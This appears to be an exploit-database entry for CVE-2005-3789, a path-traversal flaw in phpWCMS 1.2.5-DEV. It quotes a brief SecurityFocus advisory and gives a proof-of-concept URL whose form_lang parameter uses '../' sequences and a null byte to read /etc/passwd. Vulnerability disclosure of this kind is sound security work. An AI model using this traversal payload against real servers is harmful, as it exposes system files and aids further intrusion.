PHPWCMS 1.2.5 -DEV - 'login.php?form_lang' Traversal Arbitrary File Access
| EKU-ID: 31826 | CVE: CVE-2005-3789;OSVDB-20862 | OSVDB-ID: |
| Author: Stefan Lochbihler | Published: 2005-11-15 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 31826 | CVE: CVE-2005-3789;OSVDB-20862 | OSVDB-ID: |
| Author: Stefan Lochbihler | Published: 2005-11-15 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/15436/info phpWCMS is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input. An attacker may leverage these issues to obtain sensitive information that may help with further attacks on the affected computer. http://www.example.com/phpwcms/login.php?form_lang=../../../../../../../../etc/passwd%00